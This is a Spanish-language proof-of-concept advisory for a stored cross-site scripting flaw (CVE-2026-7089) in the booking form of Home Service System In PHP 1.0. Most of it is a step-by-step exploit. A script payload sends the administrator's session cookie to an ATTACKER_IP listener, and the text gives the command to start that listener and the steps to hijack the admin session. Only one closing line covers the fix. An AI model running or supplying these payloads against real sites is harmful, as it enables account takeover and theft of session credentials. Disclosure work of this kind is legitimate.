
Prueba de concepto para CVE-2026-7089, un XSS almacenado en Home Service System PHP 1.0 que permite el secuestro de sesión de administrador sin autenticación a través del formulario de reservas.
| Campo | Detalles |
|---|
| Vendedor | code-projects.org |
| Producto | Home Service System In PHP |
| Versión | 1.0 |
| Tipo de Vulnerabilidad | Cross-Site Scripting Almacenado (XSS) |
| CWE | CWE-79 |
| Autenticación Requerida | No |
| Autor | Imad Alvi |
Existe una vulnerabilidad de Cross-Site Scripting Almacenado (XSS) en el archivo booking.php de
Home Service System In PHP 1.0. Los usuarios no autenticados pueden inyectar payloads
maliciosos de JavaScript a través de los campos del formulario de reserva. La entrada
no saneada se almacena en la base de datos y se renderiza sin codificación de salida en el panel
de administración (admin.php), donde se ejecuta en el contexto del navegador del administrador.
Esto permite a un atacante no autenticado robar la cookie de sesión del administrador, realizar acciones en nombre del administrador o comprometer completamente la cuenta de administrador.
booking.phpfname, lnameadmin.php → Gestionar ReservasNavegue a la página de reservas como usuario no autenticado: http://TARGET/homeservices/booking.php?provider=
En el campo Nombre, inyecte el siguiente payload:
<script>new Image().src="http://ATTACKER_IP:PORT?c="+document.cookie</script>
Complete los campos restantes con datos válidos y envíe la reserva.
Inicie un listener en su máquina atacante:
php -S 0.0.0.0:PORT
Espere a que el administrador visite la sección Gestionar Reservas en admin.php.
El payload se ejecuta en el navegador del administrador, exfiltrando la cookie de sesión a su listener.

<script>alert(1)</script>

<script>new Image().src="http://ATTACKER_IP:7979?c="+document.cookie</script>
Esta vulnerabilidad permite a un atacante remoto no autenticado comprometer completamente la aplicación.
Un atacante puede:
PHPSESSID del administradorhtmlspecialchars() con ENT_QUOTES en toda entrada proporcionada por el usuario antes de
almacenarla o renderizarla